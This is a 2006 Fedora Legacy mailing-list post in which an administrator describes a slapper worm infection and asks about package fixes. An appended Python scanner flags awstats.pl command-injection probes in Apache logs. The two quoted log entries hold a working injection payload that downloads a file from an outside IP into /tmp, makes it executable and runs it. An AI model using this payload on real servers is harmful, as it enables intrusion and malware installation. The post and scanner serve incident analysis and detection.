slapper worm
- From: "Michael Mansour" <mic npgx com au>
- To: "Fedora Legacy" <fedora-legacy-list redhat com>
- Subject: slapper worm
- Date: Tue, 24 Jan 2006 06:32:29 +1000
Hi guys,
I have an FC1 machine which got infected twice with the slapper worm, and then
started DOS attacking a large vendor.
I've stopped slapper in its tracks with a couple of changes to FC1, but in
analysing now how it got in (it seems to use SSLv2 vulnerabilities in an apache
SSL server which I've now turned off), I see the following bit of interest in
my apache access_log:
220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
These "scripz" files end up going into /tmp, being compiled with gcc, renamed
to "httpd" and run as that.
I'm using:
perl-5.8.3-17.4.legacy
httpd-2.0.51-1.9.legacy
openssl-0.9.7a-33.13.legacy
Are there any updates FL can do to any of the packages to fix/block slapper
from an FC1 machine?
Michael.
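
Added example, not part of the original message: a small Python scanner for Apache access_log lines like the two quoted above. It URL-decodes the configdir parameter of awstats.pl requests, flags values containing shell metacharacters, and reports the response status so refused requests (403/404) can be told apart from served ones. The function name, the sample lines and the shortened payload are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined Log Format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"[A-Z]+ (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3}) ')
# Shell metacharacters that a legitimate configdir value would not contain.
SHELL_META = re.compile(r'[|;`$&<>]')

def find_configdir_probes(lines):
    """Return one dict per awstats.pl request whose decoded configdir holds shell metacharacters."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not path.lower().endswith("/awstats.pl"):
            continue
        for param in query.split("&"):  # split on '&' only: ';' is part of the payload
            name, _, raw = param.partition("=")
            value = unquote(raw)        # %2f -> '/', %3b -> ';', %20 -> ' '
            if name.lower() == "configdir" and SHELL_META.search(value):
                status = int(m.group("status"))
                # 2xx: the script was served, so that host needs a closer look;
                # 403/404: the server refused the request or did not find the script.
                hits.append({"host": m.group("host"), "time": m.group("time"), "path": path,
                             "status": status, "served": 200 <= status < 300, "decoded": value})
    return hits

# Constructed sample lines modelled on the entries in the post (RFC 5737 addresses,
# shortened payload that keeps the same percent-encoding pattern).
PAYLOAD = "configdir=|echo;echo%20YYY;cd%20%2ftmp%3bls;echo%20YYY;echo|"
TAIL = '"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"'
SAMPLE = [
    f'192.0.2.10 - - [23/Jan/2006:08:33:02 +1100] "GET /awstats/awstats.pl?{PAYLOAD} HTTP/1.1" 403 344 {TAIL}',
    f'192.0.2.10 - - [23/Jan/2006:08:33:03 +1100] "GET /cgi-bin/awstats.pl?{PAYLOAD} HTTP/1.1" 404 340 {TAIL}',
    f'192.0.2.20 - - [23/Jan/2006:09:00:00 +1100] "GET /cgi-bin/awstats.pl?config=example.com HTTP/1.1" 200 5120 {TAIL}',
]

if __name__ == "__main__":
    for h in find_configdir_probes(SAMPLE):
        print(h["time"], h["host"], h["path"], h["status"],
              "SERVED" if h["served"] else "not served", repr(h["decoded"]))
```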